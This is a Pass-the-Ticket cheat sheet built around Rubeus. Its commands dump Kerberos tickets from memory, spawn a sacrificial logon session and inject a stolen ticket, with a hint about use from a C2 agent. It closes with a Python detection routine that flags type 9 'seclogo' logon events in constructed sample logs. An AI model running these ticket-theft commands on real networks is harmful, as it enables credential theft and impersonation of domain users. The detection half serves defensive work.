Pass-the-Ticket

Rubeus

Show Kerberos tickets in all logon sessions if elevated (otherwise only tickets in the current logon session are shown):

```
PS > .\Rubeus.exe triage
```

Extract the tickets from memory:

```
PS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrap
```

Create a sacrificial process (Logon type 9) and import the TGT into its logon session:

```
PS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>
```

{% hint style="info" %} If operating Rubeus from a C2 agent, you can use steal_token instead of the /show option. {% endhint %}

{% hint style="success" %} You can also extract and reuse TGS tickets with this technique. {% endhint %}
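
The sacrificial process step above creates a logon type 9 (NewCredentials) session, which is recorded in the Security log as event 4624. The following is an added detection example, not part of the original cheat sheet or of Rubeus: it filters exported 4624 event XML for type 9 logons whose logon process is `seclogo` (assumption: the process was started through the Secondary Logon service, as `runas /netonly` is). The events, host name, user names and LUIDs are constructed sample data.

```python
import xml.etree.ElementTree as ET

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}

def make_event(logon_type, process, luid, user):
    """Build a constructed Security 4624 event in Windows event XML form."""
    return (
        f'<Event xmlns="{EVT_NS}">'
        "<System><EventID>4624</EventID>"
        "<Computer>WS01.example.test</Computer></System>"
        "<EventData>"
        f'<Data Name="TargetUserName">{user}</Data>'
        f'<Data Name="TargetLogonId">{luid}</Data>'
        f'<Data Name="LogonType">{logon_type}</Data>'
        f'<Data Name="LogonProcessName">{process}</Data>'
        "</EventData></Event>"
    )

# Constructed sample log: only the second event is a type 9 seclogo logon.
SAMPLE_EVENTS = [
    make_event(2, "User32 ", "0x3e4a1", "alice"),   # interactive logon
    make_event(9, "seclogo", "0x1337", "alice"),    # NewCredentials logon
    make_event(3, "Kerberos", "0x5b210", "bob"),    # network logon
]

def parse_4624(xml_text):
    """Return the EventData fields of a 4624 event as a dict, else None."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4624":
        return None
    # Field values can carry trailing padding, so strip them.
    fields = {d.get("Name"): (d.text or "").strip()
              for d in root.findall("e:EventData/e:Data", NS)}
    fields["Computer"] = root.findtext("e:System/e:Computer", namespaces=NS)
    return fields

def netonly_logons(events):
    """Type 9 sessions created via seclogo, as (host, user, session LUID).
    These are review leads: legitimate runas /netonly use logs the same event."""
    hits = []
    for xml_text in events:
        f = parse_4624(xml_text)
        if (f and f.get("LogonType") == "9"
                and f.get("LogonProcessName", "").lower() == "seclogo"):
            hits.append((f["Computer"], f["TargetUserName"], f["TargetLogonId"]))
    return hits

if __name__ == "__main__":
    for host, user, luid in netonly_logons(SAMPLE_EVENTS):
        print(f"{host}: type 9 logon for {user}, session LUID {luid}")
```

The returned LUID identifies the new logon session, so it can be used to pivot to process-creation and Kerberos ticket events tied to that session.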